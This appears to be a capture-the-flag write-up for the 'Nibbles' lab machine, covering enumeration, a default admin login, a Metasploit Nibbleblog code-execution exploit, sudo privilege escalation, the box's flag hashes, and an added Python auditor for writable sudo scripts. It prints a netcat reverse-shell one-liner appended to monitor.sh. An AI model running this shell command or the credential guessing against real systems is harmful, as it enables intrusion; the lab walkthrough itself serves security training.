# Nibbles

## Nibbles - 10.10.10.75

### Target Enumeration:

OS: Linux

IP: 10.10.10.75

User: b02ff32bb332deba49eeaed21152c8d8

Root: b6d745c0dfb6457c55591efc898ef88c

### Ports / Services / Software Versions Running

80/tcp open http Apache httpd 2.4.18

### Vulnerability Exploited:

Nibbleblog contains a flaw that allows an authenticated remote attacker to execute arbitrary PHP code.

### Exploiting the host:

Nmap

<div align="left"><img src="https://lh4.googleusercontent.com/420APuMpnY5dzCZSqWVD523n5g_W8pKJaiIIeGzQnqPrXd328dtykVKJk45av0SoALhP15ko5HzGsc1QRJHbBLsYlZ9OfUd_ny0urfG5iZyHebgDefpNUu87cTniOTn6gmVWTw7X" alt=""></div>

Visiting Port 80 and viewing the source code gives us the following:

<div align="left"><img src="https://lh6.googleusercontent.com/sMizMZOZAsyc395wV0AAG4RBAmn8tMVE9Cl3SK0fmD0fA9QLzK7_EeF-EzmNfvroYn8CkvoDvY3A4Es0rHKYAqotsdF0JyREN6NmAznQWyHeSI_wDfD1pluD_347NvWlKgf8A6xC" alt=""></div>

Using dirb against /nibbleblog gives us admin.php, which is a login interface.

Testing default usernames and passwords gives us admin:nibbles.

Searching for exploits gives us:

<div align="left"><img src="https://lh4.googleusercontent.com/5_clk_XuwBYZKsDyL-JBzWEyQ1YIsF4Xf5HDZimgEPN3WG8BrjwWejlKkg3imGb2Ykpbb29Eitrmun2993SoIk3b6aB07wuMPxZIBIGrNdPasCNYYKF7Y3NMmu4YV6ZDLHUcfiRz" alt=""></div>

We load metasploit and configure our options as follows:

![](https://lh6.googleusercontent.com/xoco6o95stqAIDhpSGwd7AQJHP-H_2tBS_PAHDmQW2QzfnVdziah9C1m9v4TBq13X0VvH0MJHD0CvV5XAFH8QM7wiqHMbsc5mqEfoi1RY4Zcb41PlYucXkTzapSuAubFhaBRssm2)

Run the exploit to get access as the low-privileged user nibbles:

![](https://lh5.googleusercontent.com/C3-5CAthS0662Q5SOKd5hXi9L6Tn7f7MsF5Lhbxodg7gN1SMoYp2W8hVbX45wMF_ctR8xpzx-FIjtieVE_xW6v4bUmsR95jGk1Z5d53KSvHjtVdIRCJDv51RpE6bDEebS5KefEZj)

Running LinEnum.sh on the host gives us a potential lead.

<div align="left"><img src="https://lh4.googleusercontent.com/LDGUHiqopRx9z334InU4SKnmlO5L3R8_o37izQDJuv3OBWS6Rx6HhS1WKshonDx_s7DyO5Yzf8MHHebtn1UFYbklr1qUzwZydBN0zMOgMlG35FfKVLFEckyjnI29Uf-60RFTz3L0" alt=""></div>

So we need to unzip personal.zip within /home/nibbler and modify monitor.sh to get root.

<div align="left"><img src="https://lh3.googleusercontent.com/e_Dm39PPslm7aFuw8_jTZII3MQEWJxEcunw52JReAPBAexEXp8Stkpl0f_nRiEcn_kMaMJBcjK1v1wjYmDIPkwYzIPuqtoxMXASUFMiQL0QP64Lvx2mPpfhytlaRmXXJKeCCx52M" alt=""></div>

We set up a nc listener on port 2491 locally and we insert the following command into the monitor.sh file:

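```bash
# Straight quotes are required; typographic quotes would be appended to the script literally.
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.49 2491 >/tmp/f" >> monitor.sh
```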

We then execute the monitor.sh file with /usr/bin/sudo to receive our root shell.

<div align="left"><img src="https://lh6.googleusercontent.com/w-6LVMBsAw2AOCm1Ge5qb7k6oUgGH0oWxGN872gwDfJqRkL30sCx79C01uPh98YzgTLhlk1u5pwAV5k2DWbVSraSooLwMmdTy9Vbgl7kCrz3m133tQ3uMr53LR0-GgXv0X82t6p5" alt=""></div>

The nc listener receives the root shell:

<div align="left"><img src="https://lh4.googleusercontent.com/0AeFJXDNIcZ3xav-z4fz1-ecaIjn7kTNpnJNgHabxTKlQqL1majEDQCePsCrmQaPIqrl2eoQPeI35CPblt0y9czGCJbbnIf2gDFIZKEvMkaXwtZlmGAGtlOThKMwR-Vv2Cv5IHoc" alt=""></div>
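The root step works because sudo is allowed to run a script at a path the low-privileged user can create and modify. As an added example (not part of the original write-up), this Python check parses `sudo -l` output and reports every allowed command whose file or parent directories are writable by someone other than root, including the case where the script does not exist yet. The `stuff/monitor.sh` path and the temporary-directory scenario in `demo()` are constructed.

```python
import os
import re
import stat
import tempfile

def sudo_commands(sudo_l_output):
    """Return the absolute command paths listed in `sudo -l` output."""
    rule = re.compile(r"^[ \t]*\([^)]*\)[ \t]*(?:[A-Z_]+:[ \t]*)*(.+)$", re.M)
    specs = [s.split() for body in rule.findall(sudo_l_output) for s in body.split(",")]
    return [w[0] for w in specs if w and w[0].startswith("/")]

def mode_is_risky(uid, mode):
    """True if the owner is not root or any group/other write bit is set (conservative)."""
    return uid != 0 or bool(mode & (stat.S_IWGRP | stat.S_IWOTH))

def writable_components(path):
    """List the command file and every ancestor directory that a non-root
    user could modify. Missing components are skipped: what matters is who
    can write the nearest existing directory and so create them."""
    findings = []
    current = os.path.realpath(path)
    while True:
        if os.path.exists(current):
            st = os.stat(current)
            if mode_is_risky(st.st_uid, st.st_mode):
                findings.append(current)
        parent = os.path.dirname(current)
        if parent == current:
            return findings
        current = parent

def audit(sudo_l_output):
    """Map each sudo-allowed command to its non-root-writable components."""
    report = {cmd: writable_components(cmd) for cmd in sudo_commands(sudo_l_output)}
    return {cmd: hits for cmd, hits in report.items() if hits}

def demo():
    """Constructed scenario: the rule names a script that does not exist yet
    inside a directory the invoking user controls."""
    with tempfile.TemporaryDirectory() as tmp:
        home = os.path.realpath(tmp)
        os.chmod(home, 0o777)  # stands in for a user-writable home directory
        script = os.path.join(home, "stuff", "monitor.sh")  # hypothetical path
        return home, script, audit(f"    (root) NOPASSWD: {script}\n")

if __name__ == "__main__":
    print(demo())
```

Sticky-bit directories such as /tmp are flagged as well, so review hits by hand. The fix for a real finding is to point the sudo rule at a root-owned script in a root-owned directory, or to remove the rule.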
